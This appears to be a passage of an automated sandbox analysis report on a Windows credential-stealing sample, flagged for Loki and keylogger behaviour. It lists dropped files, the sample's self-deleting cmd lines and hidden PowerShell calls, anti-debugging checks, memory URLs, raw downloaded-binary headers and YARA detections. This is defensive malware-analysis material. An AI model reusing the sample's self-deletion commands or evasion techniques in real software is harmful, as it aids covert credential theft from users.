file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-heap-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\MapiProxy_InUse.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\libEGL.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\lgpllibs.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\nssdbm3.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\nssdbm3.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-rtlsupport-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\Dewgkwlbhkrsncbybkhtfpkb.vbs
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-console-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\vcruntime140.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\mozMapi32.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\ucrtbase.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-localization-l1-2-0.dll

Creates a shortcut to an executable file (50 out of 105 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Access 2007.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\Automation Examples.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\한글2010(정품).lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Automation Reference.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\시작프로그램.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Module Docs.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditPlus.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Get Help.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Studio.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Python Manuals.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\테스트.txt.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Publisher 2007.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\다운로드.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exit.png.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk

Creates a suspicious process (5 events)

cmdline	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\ghjkl.exe"
cmdline	"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Oggnfkemtibcinconsoleapp16.exe"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
cmdline	powershell Test-Connection -ComputerName google.com
cmdline	C:\Windows\System32\cmd.exe /c C:\Windows\system32\timeout.exe 3 & del "Oggnfkemtibcinconsoleapp16.exe"

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\Dewgkwlbhkrsncbybkhtfpkb.vbs
file	C:\Users\test22\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
file	C:\Users\test22\AppData\Local\Temp\Ddmmvlnwvosotwcisp.vbs
file	C:\Users\test22\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe

Drops an executable to the user AppData folder (50 out of 70 events)

file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\breakpadinjector.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\prldap60.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-debug-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\nss3.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\nss3.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\freebl3.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\softokn3.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\vcruntime140.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-environment-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\MapiProxy.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\IA2Marshal.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-memory-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-sysinfo-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\msvcp140.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\nssdbm3.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-errorhandling-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\AccessibleHandler.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\qipcap.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-console-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\sqlite3.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\freebl3.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\ucrtbase.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\libEGL.dll
file	C:\Users\test22\AppData\Local\Temp\ghjkl.exe
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-datetime-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-handle-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\nssckbi.dll

Executes one or more WMI queries (1 event)

wmi	Select * from Win32_PingStatus where ((Address='google.com') And TimeToLive=80 And BufferSize=32)

A process created a hidden window (32 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
CreateProcessInternalW Sept. 6, 2021, 6:20 p.m.	thread_identifier: 3948 thread_handle: 0x000006e0 process_identifier: 3944 current_directory: filepath: track: 1 command_line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\ghjkl.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000006e4	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:19 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c C:\Windows\system32\timeout.exe 3 & del "Oggnfkemtibcinconsoleapp16.exe" filepath: C:\Windows\System32\cmd.exe	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1
ShellExecuteExW Sept. 6, 2021, 6:20 p.m.	show_type: 0 filepath_r: powershell parameters: Test-Connection -ComputerName google.com filepath: powershell	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return
Process32NextW Sept. 6, 2021, 6:20 p.m.	snapshot_handle: 0x0000030c process_name: pw.exe process_identifier: 604	1	1
Process32NextW Sept. 6, 2021, 6:20 p.m.	snapshot_handle: 0x0000030c process_name: taskhost.exe process_identifier: 3020	1	1
Process32NextW Sept. 6, 2021, 6:20 p.m.	snapshot_handle: 0x0000030c process_name: WmiPrvSE.exe process_identifier: 668	1	1
Process32NextW Sept. 6, 2021, 6:20 p.m.	snapshot_handle: 0x0000030c process_name: Oggnfkemtibcinconsoleapp16.exe process_identifier: 1908	1	1
Process32NextW Sept. 6, 2021, 6:20 p.m.	snapshot_handle: 0x0000030c process_name: Hsbvhggsqlrfmuvyptooonsoleapp5.exe process_identifier: 3324	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 6, 2021, 6:20 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process hsbvhggsqlrfmuvyptooonsoleapp5.exe (6 events)

Time & API	Arguments	Status	Return
InternetReadFile Sept. 6, 2021, 6:20 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢l$æ JOæ JOæ JOïuÙOê JO?oKNä JO?oINä JO?oONì JO?oNNí JOÄmKNä JO-nKNå JOæ KO~ JO-nNNò JO-nJNç JO-nµOç JO-nHNç JORichæ JOPEL¿bë[à"!¶b¼ÐP ±@¨¸È0xÐ@`ÐþT(ÿ@Ðl.textË´¶ `.rdata DÐFº@@.data @À.rsrcx0@@.reloc`@@B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 6, 2021, 6:20 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELê=Sv?à!ÐàXà` 8Ã °ÐL ü'ð¬Ñp.textÀÎÐ`0`.data°àÖ@@À.rdata$ð®æ@@@.bss @À.edata°@0@.idataL Ð®@0À.CRTàº@0À.tls ð¼@0À.relocü'(¾@0B/4`0æ@@B/19È@è@B/35MPì@B/51`C`Dô@B/63 °8@B/77ÀF@B/89ÐR request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 6, 2021, 6:20 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Àð/AVAVAVéÒVAV]ó@WAV1VAV]óBWAV]óDWAV]óEWAV¦ñ@WAVOò@WAV@VÖAVOòBWAVOòEWÀAVOòAWAVOò¾VAVOòCWAVRichAVPELØbë[à"!Øf)Ýðp£s@pæPÀæÈ@xüÐPà0âTâ@ð8.texttÖØ `.rdataüþðÜ@@.data,HðÜ@À.rsrcx@à@@.relocàPä@B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 6, 2021, 6:20 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÂU±É£;âÉ£;âÉ£;âÀÛ¨âÙ£;âWüâË£;âÁ8ãÇ£;âÁ?ãÂ£;âÁ:ãÍ£;âÁ>ãÛ£;âëÃ:ãÀ£;âÉ£:âw£;âÀ?ãÈ£;âÀ>ãÝ£;âÀ;ãÈ£;âÀÄâÈ£;âÀ9ãÈ£;âRichÉ£;âPELÄ_ë[à"!zà@3@A@Àt´Þ, xúÐ0h¹TT¹h¸@ôl¾.textÊxz `.rdata^ef~@@.data¼ä@À.didat8æ@À.rsrcx è@@.reloch0ì@B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 6, 2021, 6:21 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¦È¼Aâ©Òâ©Òâ©ÒV5=à©ÒëÑAú©Ò;ËÓá©Òâ©Ó"©Ò;ËÑë©Ò;ËÖî©Ò;Ë×ô©Ò;ËÚ©Ò;ËÒã©Ò;Ë-ã©Ò;ËÐã©ÒRichâ©ÒPEL8'Yà"!P± Ðaz@AðCÏôR,øx8?4:ðf8È(@Pð@@.textr `.data( @À.idata6P @@.didat4p6@À.rsrcø8@@.reloc4:<<@B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 6, 2021, 6:21 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $#4gâZßgâZßgâZßnÉßsâZß¾[ÞeâZßùBßcâZß¾YÞjâZß¾_ÞmâZß¾^ÞlâZßE[ÞoâZß¬[ÞdâZßgâ[ßâZß¬^ÞmãZß¬ZÞfâZß¬¥ßfâZß¬XÞfâZßRichgâZßPELbë[à"!êwð@·»@ =T°pæÐÀ}pTÈ@ø.textèê `.rdataRTî@@.datatG`"B@À.rsrcp°d@@.reloc}À~h@B request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x0014a600', u'virtual_address': u'0x00002000', u'entropy': 7.995324654729699, u'name': u'.text', u'virtual_size': u'0x0014a4c4'}

entropy

7.99532465473

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0001a800', u'virtual_address': u'0x0014e000', u'entropy': 7.596371189031652, u'name': u'.rsrc', u'virtual_size': u'0x0001a7bc'}

entropy

7.59637118903

description

A section with a high entropy has been found

entropy

0.999649859944

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (33 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2021, 6:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (2 events)

url	http://ip-api.com/json
url	https://dotbit.me/a/

Yara rule detected in process memory (35 events)

description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	Run a KeyLogger	rule	KeyLogger
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 118 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Sept. 6, 2021, 6:20 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
